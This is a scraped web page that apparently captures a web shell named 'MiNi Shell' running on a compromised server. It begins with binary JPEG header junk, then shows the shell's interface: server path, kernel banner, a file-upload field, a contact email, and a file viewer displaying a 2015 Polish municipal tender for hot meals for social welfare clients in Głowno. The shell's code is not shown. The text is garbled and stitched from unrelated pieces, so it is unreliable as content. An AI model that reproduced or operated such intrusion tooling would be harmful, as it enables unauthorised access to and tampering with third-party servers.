JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151112/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20151112/164639-N-2015.html

<p class="kh_header"><b>Głowno: Przygotowywanie dostarczanie i wydawanie gorących posiłków jednodaniowych klientom Miejskiego Ośrodka Pomocy Społecznej w Głownie w 2016 roku,</b><br>
<b>Numer ogłoszenia: 164639 - 2015; data zamieszczenia: 12.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Głownie , ul. Ludwika Norblina 1, 95-015 Głowno, woj. łódzkie, tel. 42 719 27 25, faks 42 719 27 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.glowno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu gminnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowywanie dostarczanie i wydawanie gorących posiłków jednodaniowych klientom Miejskiego Ośrodka Pomocy Społecznej w Głownie w 2016 roku,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego jest przygotowywanie, dostarczanie i wydawanie gorących posiłków jednodaniowych klientom MOPS  w Głownie w 2016 roku, zgodnie  z obowiązującymi przepisami, w szczególności ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (t.j. Dz.U. z 2015r., poz. 594) oraz przepisami wykonawczymi wydanymi na podstawie wyżej wymienionej ustawy. Przedmiot zamówienia realizowany będzie w ramach Programu wieloletniego Pomoc państwa w zakresie dożywiania w latach 2014-2020  dla klientów MOPS w Głownie.
Wielkość i zakres  przedmiotu zamówienia:
1. Przewidywana przez Zamawiającego liczba osób, objętych pomocą i uprawnionych do otrzymywania jednego gorącego posiłku dziennie w 2016r. będzie wynosiła 50 osób i może ulec zmianie. Zakres usług, będących przedmiotem zamówienia będzie obejmował odpowiednio: w skali dnia - przygotowanie, dostarczenie i wydanie 50 posiłków, ogółem w 2016r. - 12.600 posiłków. Zamawiający zastrzega sobie prawo skorzystania z prawa opcji: Minimalny zakres usług w 2016r. będzie obejmował  nie mniej niż 12.600 posiłków z możliwością rozszerzenia zakresu do nie więcej niż 22.680 posiłków. Rozszerzenie zakresu zamówienia będzie efektem zwiększenia się liczby wydanych decyzji administracyjnych, uprawniających klientów MOPS do pomocy w zakresie dożywiania.
2. Wykonawca zapewni posiłki przez 5 dni w tygodniu tj. od poniedziałku do piątku, z wyłączeniem dni świątecznych, przy czym w ciągu 5 dni serwuje po jednym daniu z każdej grupy od 1-5 wymienionej w załączniku nr 2 do umowy.
3. Gorący posiłek jednodaniowy oznacza zupę z wkładką mięsną podawaną 2 razy w tygodniu o pojemności nie mniejszej niż 500 ml z porcją pieczywa - 2 duże kromki chleba lub 1 duża bułka (co najmniej 100 gram pieczywa) oraz drugiego dania podawanego 3 razy w tygodniu  o gramaturze nie mniejszej niż 400g. Wartość kaloryczna posiłku min 700 kcal.  Wykonawca zobowiązany jest do przygotowywania posiłków na bazie własnych produktów.Wykonawca nie może wykorzystywać do przygotowywania posiłków produktów nieświeżych, złej jakości oraz produktów wysokoprzetworzonych (np. zupy w proszku). Wydawane przez Wykonawcę posiłki nie mogą być przygotowywane wcześniej niż w dniu ich wydania. Posiłki muszą być świeże, dobrej jakości, posiadać odpowiednie walory smakowe  i estetyczne.
Zamawiający wymaga, aby posiłki były urozmaicone, co oznacza, że posiłki będą przygotowywane wg zróżnicowanych jadłospisów przez kolejne tygodnie zgodnie z załącznikiem nr 2 do umowy. Każdy tygodniowy jadłospis musi się różnić od poprzedniego przynajmniej dwoma daniami. Wykonawca jest zobowiązany do przygotowywania dwutygodniowego jadłospisu (z załącznika nr 2 do umowy) i przedstawieniania go Zamawiającemu nie później niż  w ostatnim dniu roboczym tygodnia poprzedzającego jego wprowadzenie. Jadłospis może być przekazany Zamawiającemu faxem lub pocztą elektroniczną.
4. Posiłki będą wydawane klientom codziennie tj. od poniedziałku do piątku, z wyłączeniem dni świątecznych, w godzinach 12:00-15:00.
5. Wykonawca zobowiązany będzie do wydawania posiłków każdej osobie uprawnionej, posiadającej decyzję administracyjną o przyznanej pomocy w zakresie dożywiania dla siebie i członków rodziny, na podstawie imiennego talonu, ważnego na dany miesiąc ( wzór talonu stanowi załącznik nr 1 do umowy). Nie dopuszcza się wydawania zamiast gorącego jednodaniowego posiłku, innych zamiennych produktów żywnościowych lub gotówki.
Talon wydawany przez Zamawiającego zawierać będzie: pieczęć Zamawiającego, numer, imię i nazwisko osoby uprawnionej, liczbę przyznanych posiłków dla osoby uprawnionej i członków jej rodziny na każdy dzień danego miesiąca ze wskazaniem okresu przyznania posiłku. Wykonawca zobowiązany będzie do dostarczenia Zamawiającemu uzupełnionych i podpisanych przez klientów talonów za dany miesiąc  nie później niż 2 dnia miesiąca następnego po miesiącu wykonania usługi. Wykonawca zobowiązany jest do rozliczania się  z MOPS  w  Głownie na podstawie faktur lub rachunków uproszczonych za faktycznie wydane posiłki.
6. Zamawiający wymaga, aby Wykonawca świadczył usługę w lokalu zlokalizowanym w centrum Miasta Głowna, w którym będą wydawane posiłki. Przez centrum Miasta Głowna rozumie się teren w odległości nie większej niż 1000 metrów  w linii prostej licząc od siedziby Urzędu Miejskiego w Głownie przy ul. Młynarskiej 15. Lokal w którym będą wydawane posiłki musi spełniać wymogi w zakresie świadczenia usług zbiorowego żywienia, zgodnie z obowiązującymi w tym zakresie przepisami i wymogami sanitarnymi, w szczególności przepisami ustawy z dnia 25 sierpnia 2006r.  o bezpieczeństwie żywności i żywieniu (t.j. Dz.U. z 2010r. Nr 136 poz. 914 ze zm.). Lokal  ma być ogrzewany. Zamawiający wymaga, aby Wykonawca zapewnił możliwość spożywania posiłku w miejscu jego wydawania dla min. 25  osób - miejsca siedzące przy stołach.  W przypadku konsumpcji posiłku na miejscu, Wykonawca  musi zapewnić klientom własne, czyste naczynia i sztućce. Zamawiający nie dopuszcza stosowania sztućców jednorazowych. Pozostałe osoby uprawnione do otrzymania posiłku będą otrzymywały posiłki na wynos, w naczyniach jednorazowych; Wykonawca zapewni  naczynia jednorazowe, odpowiednie do rodzaju posiłku, tj, naczynie głębokie na zupę i  naczynie na drugie danie  oraz odzielne naczynie  na surówkę; posiadających  atesty higieniczne PZH, dopuszczające naczynia do kontaktu z żywnością. W lokalu, w którym będą przygotowywane i wydawane posiłki zabrania się sprzedaży i spożywania alkoholu  w godzinach 12:00-15:00, tj. w czasie wydawania posiłków.
7. W przypadku posiłków dowożonych do lokalu, gorący posiłek musi być dowieziony przez Wykonawcę na własny koszt, w  pojemnikach zbiorczych przeznaczonych do przewożenia żywności i spełniających wymogi sanitarne w godzinach 12:00-14:00. Wydawane posiłki muszą być gorące, tj. temperatura  wydawanej zupy nie może być niższa niż 750 C, temperatura wydawanego drugiego dania nie może być niższa niż 650 C. Nie dopuszcza się podgrzewania posiłków w kuchenkach mikrofalowych.
8. Wykonawca zapewni obsługę przy wydawaniu posiłków.
9. Wykonawca na swój koszt zapewni w  miejscu wydawania posiłków, wagę elektroniczną (waga powinna posiadać cechy legalizacyjne), na której  winien ważyć wydawane porcje dla klientów oraz termometr  do sprawdzania temperatury wydawanych posiłków.
10. Zamawiający zastrzega sobie prawo kontroli przeprowadzanej przez upoważnionych pracowników w zakresie należytej realizacji zamówienia, w tym zakresie jakości posiłków, gramatury,  temperatury i menu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających polegających na powtórzeniu tego samego rodzaju zamówień zgodnie z art. 67 ust.1 pkt. 6 Ustawy Prawo zamówień publicznych (j.t. Dz. U. z 2013 r., poz. 907 ze zm.) stanowiących nie więcej niż 50 % wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9, 55.32.10.00-6, 55.32.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunków w ww. zakresie. Zamawiający uzna warunek za spełniony jeżeli wykonawca załączy do oferty oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunków w zakresie posiadania wiedzy i doświadczenia. Zamawiający uzna warunek za spełniony jeżeli wykonawca załączy do oferty oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże spełnienie warunku, jeśli wykaże się dysponowaniem ogrzewanym lokalem w którym będą wydawane posiłki, spełniającym wymogi w zakresie świadczenia usług zbiorowego żywienia, zgodnie z obowiązującymi w tym zakresie przepisami i wymogami sanitarnymi, w szczególności przepisami ustawy z dnia 25 sierpnia 2006r.  o bezpieczeństwie żywności i żywieniu (t.j. Dz.U. z 2015r., poz. 594) zlokalizowanym w linii prostej w odległości nie większej niż 1000 metrów od siedziby urzędu Miejskiego w Głownie przy ul. Młynarskiej 15 wyposażonym w stoły i 25 miejsc siedzących przy stołach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunków w zakresie posiadania wiedzy i doświadczenia. Zamawiający uzna warunek za spełniony jeżeli wykonawca załączy do oferty oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunków w ww. zakresie. Zamawiający uzna warunek za spełniony jeżeli wykonawca załączy do oferty oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Prawo zamówień publicznych.
Zamawiający oceni spełnianie ww. warunków udziału w postępowaniu metodą spełnia/nie spełnia, na podstawie dokumentów załączonych do oferty.
Wykonawca musi wykazać spełnienie każdego z warunków. Niespełnienie któregokolwiek warunku spowoduje wykluczenie Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98.00</li>
<li>2 - Termoin płatności - 2.00</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający dopuszcza zmianę postanowień zawartej umowy w następujących przypadkach:
1) w uzasadnionych przypadkach, gdy zajdzie konieczność wprowadzenia zmian wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
2) w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla Zamawiającego, a zmiany wynikły w trakcie realizacji zamówienia, ), np.: Zamawiający dopuszcza możliwość do zmiany jadłospisu pod warunkiem, że będą spełnione warunki specyfikacji istotnych warunków zamówienia po uprzednim zaaprobowaniu przez Zamawiającego oraz w zakresie miejsca wydawania posiłków  po zaaprobowaniu tej zmiany przez Zamawiającego na podstawie dokumentów potwierdzających prawo do dysponowania lokalem oraz wymagań dotyczących lokalu określonych w siwz.
3) zawieszenia usług przez Zamawiającego,
4) zmiany stawki od towarów i usług - Zamawiający dokona zmiany wynagrodzenia umownego o kwotę wynikającą ze zmiany stawki od towarów i usług o kwotę wynikającą z tej zmiany, pod warunkiem, że Wykonawca wykaże iż zmiana miała wpływ na koszty wykonywania zamówienia.
W przypadku, gdy Zamawiający zaakceptuje wniosek wykonawcy zmiana zostanie uwzględniona od dnia, w którym miała ona wpływ na wynagrodzenie Wykonawcy.
5) zmiany danych Wykonawcy np. zmiana adresu, konta bankowego, nr REGON, osób kontaktowych itp.,
6) zmiany stanu prawnego.
3. Warunki dokonania zmian:
a. zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, wyrażoną na piśmie, pod rygorem nieważności,
b. strona występująca o zmianę postanowień zawartej umowy:
opisze zaistniałe okoliczności,
uzasadni, udokumentuje zaistnienie powyższych okoliczności,
obliczy koszty zmiany, jeśli zmiana będzie miała wpływ na wynagrodzenie Wykonawcy,
opisze wpływ zmian na cenę, termin wykonania umowy.
c. wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.
1. Zmiany określone w ust. 1 pkt 5 nie wymagają sporządzenia aneksu do umowy.
2. Zamawiający dopuszcza możliwość zmiany Podwykonawcy/ów za pisemną zgodą Zamawiającego w zakresie określonym w ofercie lub wprowadzenie nowych z zastrzeżeniem, iż nie mogą oni realizować części zamówienia przewidzianej do wyłącznej kompetencji Wykonawcy (o ile takie zastrzeżenie zostało dokonane przez Zamawiającego w SIWZ). Wraz z wnioskiem o zmianę Podwykonawcy/ów, Wykonawca zobowiązany jest przedstawić umowę/projekt umowy z podwykonawcą/podwykonawcami. W przypadku powołania się Wykonawcy na potencjał innego podmiotu w celu wykazania spełniania warunków udziału w postępowaniu na zasadach określonych w art. 26 ust 2 lit. b ustawy, a podmiot ten będzie wykonywał część zamówienia, w celu zmiany podwykonawcy Wykonawca zobowiązany będzie przedłożyć dokumenty potwierdzające spełnianie warunków udziału w postępowaniu przez ten podmiot w stopniu nie mniejszym niż dotychczasowy podwykonawca. Zamawiający przed wyrażeniem zgody na zmianę takiego podwykonawcy dokona weryfikacji tych dokumentów analogicznie jak w postępowaniu o udzielenie zamówienia publicznego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.glowno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Głownie
ul. Ludwika Norblina 1
95-015 Głowno
(Sekretariat pok nr 4).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2015 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Głownie
ul. Ludwika Norblina 1
95-015 Głowno
(Sekretariat pok nr 4).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com